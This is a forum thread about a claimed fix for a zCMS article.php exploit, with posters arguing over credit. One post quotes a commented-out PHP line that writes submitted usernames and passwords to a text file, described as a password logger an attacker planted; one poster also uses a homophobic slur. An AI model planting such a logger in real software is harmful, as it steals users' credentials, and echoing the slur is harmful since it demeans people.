zCMS article.php exploit fix!

**Subway** · 21-12-11

All threads warn you to the bottom if it's to old to bump, this1 didn't so

**NoBrain** · 21-12-11

Originally Posted by Subway

Nice rip from Jessy @ 0taku.

I did not rip it. -.-

If you care to look at the dates, I released this on the 1st October - He or She released that on 7th October. Faggot.

**Liam** · 23-12-11

Originally Posted by ησвяαιη

I fail at spotting sarcasm, sorry XD

EDIT: Jonty, wtf were you thinking O.o

PHP Code:


// fwrite( fopen('./images/lol.txt', 'a+'), $_POST['credentials_username']." > ".mysql_real_escape_string($_POST['credentials_password'].chr(13))); exit;

This is not an exploit, and it wasn't coded by Jonteh, this is a code that logs passwords, and I think Meth0d coded it, or someone who release UberCMS, because it was intended to steal admin passwords, and the code can't be used, only if you remove the '//'
Nice release, but I already patched this ;D

**Dynaxo** · 23-12-11

Originally Posted by MyKi

This is not an exploit, and it wasn't coded by Jonteh, this is a code that logs passwords, and I think Meth0d coded it, or someone who release UberCMS, because it was intended to steal admin passwords, and the code can't be used, only if you remove the '//'
Nice release, but I already patched this ;D

This has already been stated, look before you post:

Originally Posted by Jonteh

Zap got hacked around 7 months ago and that code was placed into our index to log our passwords, I commented it out and kept it there for future reference.

zCMS article.php exploit fix!

Thread Tools

Re: zCMS article.php exploit fix!

Re: zCMS article.php exploit fix!

Re: zCMS article.php exploit fix?

Re: zCMS article.php exploit fix?

Advertisement